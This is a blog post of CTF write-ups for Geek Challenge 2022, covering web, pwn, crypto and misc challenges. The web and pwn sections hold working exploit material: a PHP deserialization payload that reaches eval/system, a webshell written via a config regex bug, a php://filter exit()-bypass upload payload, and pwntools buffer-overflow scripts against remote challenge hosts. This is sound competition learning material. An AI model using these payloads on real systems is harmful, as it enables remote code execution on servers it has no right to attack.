<p>注释说明有备份文件，扫目录，下载备份文件</p>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211151533708.png?x-oss-process=hzy" alt="image-20221115153322623"></p>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211151534612.png?x-oss-process=hzy" alt="image-20221115153452544"></p>
<p>发现这是个简单混淆类加密，也就是直接用就行</p>
<p><a target="_blank" rel="noopener" href="https://www.toolnb.com/tools/phpcarbylamine.html">https://www.toolnb.com/tools/phpcarbylamine.html</a></p>
<p>解密之后如下</p>
<pre><code class="hljs plaintext">&lt;?php
class BillyHerrington
&#123;
        public $a;

        public function __wakeup()
        &#123;
                $this -&gt; a = &quot;fxxk you &quot;;
        &#125;

        public function __destruct()
        &#123;
                echo $this -&gt; a.&quot;Wow&quot;;
        &#125;
&#125;

class Baoglady&#123;
        public $b;
        public $c;

        public function __toString()
        &#123;
                $this -&gt; b -&gt; happy($this -&gt; c);
        &#125;
&#125;

class VanDarkholme&#123;
        public $d;

        public function happy($cmd)&#123;
                eval($cmd);
        &#125;
&#125;

if(isset($_POST[&#x27;str&#x27;]))&#123;
        unserialize($_POST[&#x27;str&#x27;]);
&#125;
</code></pre>
<p>原来，原来是反序列化</p>
<pre><code class="hljs plaintext">&lt;?php
class BillyHerrington
&#123;
    public $a;
    public function __construct()&#123;
        $this-&gt;a = new Baoglady();
    &#125;
    public function __wakeup() 
    &#123;
        $this-&gt;a = &quot;fxxk you &quot;;
    &#125;

    public function __destruct()
    &#123;
        echo $this-&gt;a.&quot;Wow&quot;;
    &#125;
&#125;

class Baoglady
&#123;
    public $b;
    public $c;
    public function __construct()&#123;
        $this-&gt;b = new VanDarkholme();
        $this-&gt;c = &quot;system(&#x27;whoami&#x27;);&quot;;
    &#125;

    public function __toString()
    &#123;
        $this-&gt;b-&gt;happy($this-&gt;c);
    &#125;
&#125;

class VanDarkholme
&#123;
    public $d;

    public function happy($cmd)
    &#123;
        eval($cmd);
    &#125;
&#125;
$payload = new BillyHerrington();
echo serialize($payload);</code></pre>
<pre><code class="hljs plaintext">O:15:&quot;BillyHerrington&quot;:5:&#123;s:1:&quot;a&quot;;O:8:&quot;Baoglady&quot;:2:&#123;s:1:&quot;b&quot;;O:12:&quot;VanDarkholme&quot;:1:&#123;s:1:&quot;d&quot;;N;&#125;s:1:&quot;c&quot;;s:17:&quot;system(&#x27;whoami&#x27;);&quot;;&#125;&#125;</code></pre>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211212132381.png?x-oss-process=hzy" alt="image-20221121213209267"></p>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211212132327.png?x-oss-process=hzy" alt="image-20221121213244231"></p>
<p>SYC{XD_why_php_s0_1nter3sting}</p>
<h2 id="uploadrce">uploadrce</h2>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211161806459.png?x-oss-process=hzy" alt="image-20221116180611010"></p>
<p>备份文件先扫一下目录</p>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211161807194.png?x-oss-process=hzy" alt="image-20221116180725100"></p>
<p>第一个备份文件是config.php的备份文件，内容如下</p>
<pre><code class="hljs plaintext">   $$option=&#x27;chinfo&#x27;; &lt;?php 
   
   &lt;?php 
$option=&#x27;chinfo&#x27;;</code></pre>
<p>第二个备份文件内容如下</p>
<pre><code class="hljs plaintext">ffile_put_contents(&#x27;./config.php&#x27;, $file); $file = preg_replace(&#x27;|\$option=\&#x27;.*\&#x27;;|&#x27;, &quot;\$option=&#x27;$str&#x27;;&quot;, $file); $file = file_get_contents(&#x27;./config.php&#x27;);     &#125;       echo &#x27;:Where is the source code of config.php?&#x27;; if($str != NULL)&#123;  $str = addslashes($_GET[&#x27;option&#x27;]); if(!isset($_GET[&#x27;option&#x27;])) die(); &lt;?php</code></pre>
<p>整理一下如下</p>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211161913269.png?x-oss-process=hzy" alt="image-20221116191303152"></p>
<p>正则匹配绕过</p>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211162029989.png?x-oss-process=hzy" alt="image-20221116202947921"></p>
<p>这个时候再get传一下chinfo就会把\正则匹配替换掉</p>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211161809298.png?x-oss-process=hzy" alt="image-20221116180918207"></p>
<p>phpinfo了，但是没找到flag，看来得shell才行</p>
<p>通过这两个泄露的源码本地起个环境试试，发现可以写马</p>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211161945659.png?x-oss-process=hzy" alt="image-20221116194525577"></p>
<p>写马之前和写马之后config.php的内容变化</p>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211161946516.png?x-oss-process=hzy" alt="image-20221116194602468"></p>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211161946009.png?x-oss-process=hzy" alt="image-20221116194619952"></p>
<p>正则，所以再get一下初始值，\就被正则替换掉了，马就出来了</p>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211161947433.png?x-oss-process=hzy" alt="image-20221116194702381"></p>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211161947349.png?x-oss-process=hzy" alt="image-20221116194752278"></p>
<p>远程这样打发现还是不行，后来发现是url编码问题，只需要把马编码之后再传进去就可以了，其他思路和刚才都一样</p>
<blockquote>
<p>[]和$编码都有问题</p>
</blockquote>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211162102798.png?x-oss-process=hzy" alt="image-20221116210223836"></p>
<p>SYC{y0u_c@n_RCEME_n0w!}</p>
<p>参考：</p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_30888707/article/details/94925910?spm=1001.2101.3001.6661.1&amp;utm_medium=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-1-94925910-blog-101026548.pc_relevant_3mothn_strategy_recovery&amp;depth_1-utm_source=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-1-94925910-blog-101026548.pc_relevant_3mothn_strategy_recovery&amp;utm_relevant_index=1">https://blog.csdn.net/weixin_30888707/article/details/94925910?spm=1001.2101.3001.6661.1&amp;utm_medium=distribute.pc_relevant_t0.none-task-blog-2~default~CTRLIST~Rate-1-94925910-blog-101026548.pc_relevant_3mothn_strategy_recovery&amp;depth_1-utm_source=distribute.pc_relevant_t0.none-task-blog-2~default~CTRLIST~Rate-1-94925910-blog-101026548.pc_relevant_3mothn_strategy_recovery&amp;utm_relevant_index=1</a></p>
<h2 id="not_stay">Not_Stay</h2>
<blockquote>
<p>hint: stay,don’t exitt</p>
</blockquote>
<p>文件上传题目，源码如下</p>
<pre><code class="hljs plaintext">I need dataI need name &lt;?php
//简单的实现文件头检测
include_once(&#x27;waf.php&#x27;);
function  uuid()  
&#123;  
    $chars = md5(uniqid(mt_rand(), true));  
    $uuid = substr ( $chars, 0, 8 ) . &#x27;-&#x27;
            . substr ( $chars, 8, 4 ) . &#x27;-&#x27; 
            . substr ( $chars, 12, 4 ) . &#x27;-&#x27;
            . substr ( $chars, 16, 4 ) . &#x27;-&#x27;
            . substr ( $chars, 20, 12 );  
    return $uuid ;  
&#125;  
$safe_header = &#x27;&lt;?php exit();?&gt;&#x27;;
if(!isset($_COOKIE[&#x27;path&#x27;]))&#123;
    setcookie(&#x27;path&#x27;,uuid());
    exit();
&#125;
$path = &#x27;./upload/&#x27;.$_COOKIE[&#x27;path&#x27;].&#x27;/&#x27;;
if(!is_dir($path))&#123;
    mkdir($path);
    chmod($path,0755);
&#125;
$file_data = $_POST[&#x27;data&#x27;];
$filename = $_POST[&#x27;filename&#x27;];
if(isset($_POST[&#x27;data&#x27;]))&#123;
    file_put_contents(&#x27;/tmp/&#x27;.$_COOKIE[&#x27;path&#x27;],$file_data);
    $file_type = exif_imagetype(&#x27;/tmp/&#x27;.$_COOKIE[&#x27;path&#x27;]);
    if($file_type != &quot;GIF&quot; &amp;&amp; $file_type != &quot;PNG&quot;)&#123;
        die(&#x27;nonono&#x27;);
    &#125;
&#125;else&#123;
    echo &quot;I need data&quot;;
&#125;
if(isset($_POST[&#x27;filename&#x27;]))&#123;
    file_put_contents($filename,$safe_header.$file_data);
&#125; else &#123;
    echo &quot;I need name&quot;;
&#125;
show_source(__FILE__);
?&gt;</code></pre>
<p>首先是文件头检测，这个只需要带上GIF89a就能绕过</p>
<p>第二步就是死亡绕过，exit()，绕过方法就是通过php://filter的base64-decode将死亡函数变成phpexit</p>
<blockquote>
<p>base64是八位一组解码，所以需要补齐</p>
</blockquote>
<p>构造base64</p>
<blockquote>
<p><em>base64_encode(“<?php echo system("ls /");?>”);</em></p>
<p>PD9waHAgZWNobyBzeXN0ZW0oImxzIC8iKTs/Pg==</p>
</blockquote>
<p>data=GIF89aaaaPD9waHAgZWNobyBzeXN0ZW0oImxzIC8iKTs/Pg==&amp;filename=php://filter/write=convert.base64-decode/resource=./upload/huang/1.php</p>
<p>摆了，传不上去</p>
<h2 id="drinktea">drinktea</h2>
<blockquote>
<p>hint: an4er说想吃双皮奶，你能帮帮他吗？环境每隔30分钟重置；你知道f4tb3e在syc的B站号上分享了什么吗</p>
</blockquote>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211212320250.png?x-oss-process=hzy" alt="image-20221121232046862"></p>
<p>首先先注册一个号登陆进去</p>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211212321860.png?x-oss-process=hzy" alt="image-20221121232126550"></p>
<p>反馈页面看到hint</p>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211212322679.png?x-oss-process=hzy" alt="image-20221121232251577"></p>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211212323436.png?x-oss-process=hzy" alt="image-20221121232324381"></p>
<pre><code class="hljs plaintext">
&lt;!-- 其实这个反馈界面还在调试阶段捏，我前几天上班摸鱼了…… --&gt;
&lt;?php
//真的随机吗？
$seed = file_get_contents(&quot;/seed&quot;);

mt_srand($seed);
mt_rand();//   == 1567320364
mt_rand();
mt_rand();
mt_rand();
mt_rand();
mt_rand();
$code = md5(mt_rand());
echo file_get_contents(&quot;random.php&quot;);
?&gt;</code></pre>
<p>爆破种子得到666666</p>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211212325811.png?x-oss-process=hzy" alt="image-20221121232531696"></p>
<pre><code class="hljs plaintext">
&lt;?php
//真的随机吗？
//$seed = file_get_contents(&quot;/seed&quot;);
$seed=666666;
mt_srand($seed);
mt_rand();//   == 1567320364
mt_rand();
mt_rand();
mt_rand();
mt_rand();
mt_rand();
$code = md5(mt_rand());
echo $code;
//echo file_get_contents(&quot;random.php&quot;);
?&gt;</code></pre>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211212328191.png?x-oss-process=hzy" alt="image-20221121232855105"></p>
<p>得到code=2bfd7154e1f327a42dae866bac9ecd45</p>
<p>主页源码也有个hint</p>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211212330756.png?x-oss-process=hzy" alt="image-20221121233012602"></p>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211212330307.png?x-oss-process=hzy" alt="image-20221121233027136"></p>
<p>把那个上面的code反馈提交</p>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211212336570.png?x-oss-process=hzy" alt="image-20221121233610418"></p>
<p>然后就卡着了</p>
<h1 id="pwn">PWN</h1>
<h2 id="nc">NC</h2>
<p>签到</p>
<p>SYC{n0w_d0~y0u-know_wh@7-1$_n&lt;_w#47-15-pwn}</p>
<h2 id="pwn1_1">pwn1_1</h2>
<p>基础栈溢出</p>
<p>有backdoor</p>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211151555492.png?x-oss-process=hzy" alt="image-20221115155537426"></p>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211151604248.png?x-oss-process=hzy" alt="image-20221115160408177"></p>
<pre><code class="hljs plaintext">from pwn import *
context.log_level=&quot;debug&quot;
#p = process(&quot;./pwn1_1&quot;)
p = remote(&#x27;gxh191.top&#x27;,25544)
payload = b&#x27;a&#x27;*24 +p64(0X401196)
p.sendline(payload)
p.interactive()</code></pre>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211151605327.png?x-oss-process=hzy" alt="image-20221115160520246"></p>
<p>SYC{w3l[oMe-70-yovr_8a[Kd0or_w0r1d~17-15-3a2y}</p>
<h2 id="pwn2_1">pwn2_1</h2>
<p>首先先是checksec</p>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211160106204.png?x-oss-process=hzy" alt="image-20221116010635098"></p>
<p>发现和第一个一样，而且也是有/bin/sh</p>
<p>只不过看main函数的时候发现多了一个长度限制</p>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211160107204.png?x-oss-process=hzy" alt="image-20221116010708138"></p>
<p>其他都和第一个栈溢出一样，所以这道题目的思路无非就是多了个长度绕过，主函数main中read后的if判断，read函数可以读取16个字符，但if条件中只允许字符长度为9，因此，可通过在payload中间的位置填充0x00，使得strlen函数截断，虽然read函数超过了9个字节，但strlen的返回值仍然不大于9</p>
<p>接下来gdb动态调试</p>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211160114389.png?x-oss-process=hzy" alt="image-20221116011429302"></p>
<p>单步n，一直到read的位置，这是堆栈空间还没有被污染的样子，main函数执行完后，会从堆栈中弹出下一条指令的地址（这是main返回后要去的地方）</p>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211160116991.png?x-oss-process=hzy" alt="image-20221116011654924"></p>
<p>箭头指的地方就是即将要跳转到的地址</p>
<pre><code class="hljs plaintext">from pwn import *
context.log_level = &quot;debug&quot;
#r = process(&#x27;./pwn2_1&#x27;)
r = remote(&#x27;gxh191.top&#x27;,25540)

shell_addr = 0x4011EF
payload = b&#x27;\x00&#x27; * 0x18 + p64(shell_addr)
# 只要buf在前16字节有\x00就可以绕过strlen
# payload = &#x27;a&#x27;*0x07+&#x27;\x00&#x27;+&#x27;a&#x27;*0x10 + p64(shell_addr)

r.recvuntil(&#x27;This is your second pwn challenge ;)\n&#x27;)
r.sendline(payload)
r.interactive()

</code></pre>
<p>SYC{enj0y_8@ckd0or_3njoy_1iF3-3nj0y_3Veryth1n9}</p>
<p>参考：</p>
<p>[(77条消息) <a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_43363675/article/details/117438963">NTUSTISC pwn LAB 2]栈溢出：gdb动态调试bof2_漫小牛的博客-CSDN博客</a></p>
<h1 id="crypto">CRYPTO</h1>
<h2 id="ez_classic">ez_classic</h2>
<pre><code class="hljs plaintext">-.. .-.. .-. --- .-- --- - .--. -.-- .-. -.-. --- .-.. .-.. . ....</code></pre>
<p>摩斯密码</p>
<p>SYC{DLROWOTPYRCOLLEH}</p>
<p>SYC{dlrowotpyrcolleh}然后倒序</p>
<p>SYC{hellocryptoworld}</p>
<h2 id="w_or_m未解决">w_or_m?【未解决】</h2>
<blockquote>
<p>hint: 好像是古典密码? 1、a variant&amp;variant zigzag cipher</p>
</blockquote>
<pre><code class="hljs plaintext">0_cmdo1elfe_2_&#125;WtoC!&#123;0mr!C__7!YtepoS34</code></pre>
<p>varint zigzag 编码</p>
<h2 id="definitely-ez-rsa">definitely ez RSA</h2>
<pre><code class="hljs plaintext">from Crypto.Util.number import *
import libnum

flag = b&#x27;****hidden_message****&#x27;
p = getPrime(512)
q = getPrime(512)
n = p * q
e = 6
m = libnum.s2n(flag)
c = pow(m,e,n)
print(c)
print(n)

&#x27;&#x27;&#x27;
*****************************************************
c = 50072006338339389555118552154159240037219794211505206943873038914830972293138548550568229783754227896661905769853250134014183574039535969574789925550365619292404703617997980492432173682029840923107651199593049684918577536870537471401209938966780904496397505606866028917883152417396458811357069626629334483341
n = 1471944036428335385397209957183a14310463580322118979932658805936518215523735242613107271741138837389303135352865058107054820876285524238471152015504027014461168105771913435200522726300893493981125032256531337768716089003105857799620333243431585087621669813946444872568719527503184655024233193716871553607529747
*****************************************************
&#x27;&#x27;&#x27;</code></pre>
<p>这个n里面有a，貌似是十六进制，转十进制之后yafu分解pq</p>
<p>147194403642833538539720995718314310463580322118979932658805936518215523735242613107271741138837389303135352865058107054820876285524238471152015504027014461168105771913435200522726300893493981125032256531337768716089003105857799620333243431585087621669813946444872568719527503184655024233193716871553607529747</p>
<p>分解不成，看题目发现直接循环匹配正确就是flag</p>
<pre><code class="hljs plaintext">import gmpy2
c = 50072006338339389555118552154159240037219794211505206943873038914830972293138548550568229783754227896661905769853250134014183574039535969574789925550365619292404703617997980492432173682029840923107651199593049684918577536870537471401209938966780904496397505606866028917883152417396458811357069626629334483341

n = 147194403642833538539720995718314310463580322118979932658805936518215523735242613107271741138837389303135352865058107054820876285524238471152015504027014461168105771913435200522726300893493981125032256531337768716089003105857799620333243431585087621669813946444872568719527503184655024233193716871553607529747

e=6
while True:
   r,b=gmpy2.iroot(c,6)
   if b:
      print (str(r))
      break
   c += n

//31184445685322090722265606472952251987042343442391421</code></pre>
<p>SYC{0ops_y0u_f1Nd_m3!}</p>
<h2 id="starterrsa">StarterRSA</h2>
<p>题目如下</p>
<pre><code class="hljs plaintext">n= 69984814757288857831977509185208500866724771756561629279687819301222483218728663
e= 65537
c= 67672845063517415442486175096448664617581579564885311842326107871805595697454701</code></pre>
<p>分解pq然后一把梭</p>
<pre><code class="hljs plaintext">p = 733
q = 95477237049507309456995237633299455479842799122185033123721445158557275878211</code></pre>
<p>b’SYC{5t4rt_R5A_ls_1t_3a5y?}’</p>
<h1 id="misc">MISC</h1>
<h2 id="0哪里有0流口水未解决">0?哪里有0[流口水]【未解决】</h2>
<p>零宽字符隐写</p>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211171442687.png?x-oss-process=hzy" alt="image-20221117144251033"></p>
<p>这个零宽字符懒得搞，直接解也没解出来，摆了</p>
<h2 id="ezforensics未解决">EzForensics【未解决】</h2>
<p>内存取证</p>
<p>volatility一把梭发现跑不动</p>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211171604365.png?x-oss-process=hzy" alt="image-20221117160457917"></p>
<p>直接使用grep搜，发现有提示哎</p>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211171609624.png?x-oss-process=hzy" alt="image-20221117160925426"></p>
<p>今年是2022所以猜测学号应该是有2022</p>
<pre><code class="hljs plaintext">flag: SYC&#123;md5(学号+程序输出字符串+秘密)&#125;</code></pre>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211171610157.png?x-oss-process=hzy" alt="image-20221117161027974"></p>
<pre><code class="hljs plaintext">2022102411023200</code></pre>
<p>secretkey_is_setpsiginfo__isoc99_vfwscanf</p>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202211171612352.png?x-oss-process=hzy" alt="image-20221117161240168"></p>

    </div>

    
    
    
        <div class="reward-container">
  <div>制作不易，如若感觉写的不错，欢迎打赏</div>
  <button onclick="var qr = document.getElementById('qr'); qr.style.display = (qr.style.display === 'none') ? 'block' : 'none';">
    打赏
  </button>
  <div id="qr" style="display: none;">
      
      <div style="display: inline-block;">
        <img src="/images/wechat.jpg" alt="故里 微信支付">
        <p>微信支付</p>
      </div>
      
      <div style="display: inline-block;">
        <img src="/images/zhifubao.jpg" alt="故里 支付宝">
        <p>支付宝</p>
      </div>

  </div>
</div>

        

<div>
<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者： </strong>故里
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="https://hzy2003628.top/2022/11/21/%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%982022/" title="Geek Challenge 2022">https://hzy2003628.top/2022/11/21/极客大挑战2022/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>


      <footer class="post-footer">
          
          <div class="post-tags">
              <a href="/tags/%E8%B5%9B%E5%90%8E%E5%A4%8D%E7%9B%98/" rel="tag"><i class="fa fa-tag"></i> 赛后复盘</a>
              <a href="/tags/CTF/" rel="tag"><i class="fa fa-tag"></i> CTF</a>
          </div>

        



        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2022/11/04/2022%E5%B7%A5%E6%8E%A7CTF/" rel="prev" title="2022河南工控CTF">
      <i class="fa fa-chevron-left"></i> 2022河南工控CTF
    </a></div>
      <div class="post-nav-item">
    <a href="/2022/12/05/TUCTF%202022/" rel="next" title="TUCTF 2022">
      TUCTF 2022 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          
    <div class="comments" id="valine-comments"></div>

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>




        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%89%8D%E8%A8%80"><span class="nav-number">1.</span> <span class="nav-text">前言</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#web"><span class="nav-number">2.</span> <span class="nav-text">WEB</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#can-can-need"><span class="nav-number">2.1.</span> <span class="nav-text">Can Can Need</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#l0vesyc"><span class="nav-number">2.2.</span> <span class="nav-text">L0veSyc</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%9D%A5%E5%8F%91%E4%B8%AA%E5%8C%85"><span class="nav-number">2.3.</span> <span class="nav-text">来发个包</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#justphp"><span class="nav-number">2.4.</span> <span class="nav-text">justphp</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%99%BB%E9%99%86%E8%AF%95%E8%AF%95"><span class="nav-number">2.5.</span> <span class="nav-text">登陆试试</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#welcomesql"><span class="nav-number">2.6.</span> <span class="nav-text">WelcomeSQL</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#jsfind"><span class="nav-number">2.7.</span> <span class="nav-text">jsfind</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#ezr_f_i"><span class="nav-number">2.8.</span> <span class="nav-text">ezR_F_I</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#babyupload"><span class="nav-number">2.9.</span> <span class="nav-text">babyupload</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#ezrce"><span class="nav-number">2.10.</span> <span class="nav-text">ezrce</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#easyphp"><span class="nav-number">2.11.</span> <span class="nav-text">easyphp</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#uploadrce"><span class="nav-number">2.12.</span> <span class="nav-text">uploadrce</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#not_stay"><span class="nav-number">2.13.</span> <span class="nav-text">Not_Stay</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#drinktea"><span class="nav-number">2.14.</span> <span class="nav-text">drinktea</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#pwn"><span class="nav-number">3.</span> <span class="nav-text">PWN</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#nc"><span class="nav-number">3.1.</span> <span class="nav-text">NC</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#pwn1_1"><span class="nav-number">3.2.</span> <span class="nav-text">pwn1_1</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#pwn2_1"><span class="nav-number">3.3.</span> <span class="nav-text">pwn2_1</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#crypto"><span class="nav-number">4.</span> <span class="nav-text">CRYPTO</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#ez_classic"><span class="nav-number">4.1.</span> <span class="nav-text">ez_classic</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#w_or_m%E6%9C%AA%E8%A7%A3%E5%86%B3"><span class="nav-number">4.2.</span> <span class="nav-text">w_or_m?【未解决】</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#definitely-ez-rsa"><span class="nav-number">4.3.</span> <span class="nav-text">definitely ez RSA</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#starterrsa"><span class="nav-number">4.4.</span> <span class="nav-text">StarterRSA</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#misc"><span class="nav-number">5.</span> <span class="nav-text">MISC</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#0%E5%93%AA%E9%87%8C%E6%9C%890%E6%B5%81%E5%8F%A3%E6%B0%B4%E6%9C%AA%E8%A7%A3%E5%86%B3"><span class="nav-number">5.1.</span> <span class="nav-text">0?哪里有0[流口水]【未解决】</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#ezforensics%E6%9C%AA%E8%A7%A3%E5%86%B3"><span class="nav-number">5.2.</span> <span class="nav-text">EzForensics【未解决】</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="故里"
      src="/images/avatar.png">
  <p class="site-author-name" itemprop="name">故里</p>
  <div class="site-description" itemprop="description">没有所谓失败，除非你不再尝试</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">103</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">18</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">37</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="mailto:2596328958@qq.com" title="E-Mail → mailto:2596328958@qq.com" rel="noopener" target="_blank"><i class="envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>



      </div>
	  

	     <!-- canvas粒子时钟 -->
        
        <div id="">
  <canvas id="canvas" style="width:60%;">
</div>
<script async>
(function(){
  var WINDOW_WIDTH = 820;
  		var WINDOW_HEIGHT = 250;
  		var RADIUS = 7; //球半径
  		var NUMBER_GAP = 10; //数字之间的间隙
  		var u=0.65; //碰撞能量损耗系数
  		var context; //Canvas绘制上下文
  		var balls = []; //存储彩色的小球
  		const colors = ["#33B5E5","#0099CC","#AA66CC","#9933CC","#99CC00","#669900","#FFBB33","#FF8800","#FF4444","#CC0000"]; //彩色小球的颜色
  		var currentNums = []; //屏幕显示的8个字符
  		var digit =
                  [
                      [
                          [0,0,1,1,1,0,0],
                          [0,1,1,0,1,1,0],
                          [1,1,0,0,0,1,1],
                          [1,1,0,0,0,1,1],
                          [1,1,0,0,0,1,1],
                          [1,1,0,0,0,1,1],
                          [1,1,0,0,0,1,1],
                          [1,1,0,0,0,1,1],
                          [0,1,1,0,1,1,0],
                          [0,0,1,1,1,0,0]
                      ],//0
                      [
                          [0,0,0,1,1,0,0],
                          [0,1,1,1,1,0,0],
                          [0,0,0,1,1,0,0],
                          [0,0,0,1,1,0,0],
                          [0,0,0,1,1,0,0],
                          [0,0,0,1,1,0,0],
                          [0,0,0,1,1,0,0],
                          [0,0,0,1,1,0,0],
                          [0,0,0,1,1,0,0],
                          [1,1,1,1,1,1,1]
                      ],//1
                      [
                          [0,1,1,1,1,1,0],
                          [1,1,0,0,0,1,1],
                          [0,0,0,0,0,1,1],
                          [0,0,0,0,1,1,0],
                          [0,0,0,1,1,0,0],
                          [0,0,1,1,0,0,0],
                          [0,1,1,0,0,0,0],
                          [1,1,0,0,0,0,0],
                          [1,1,0,0,0,1,1],
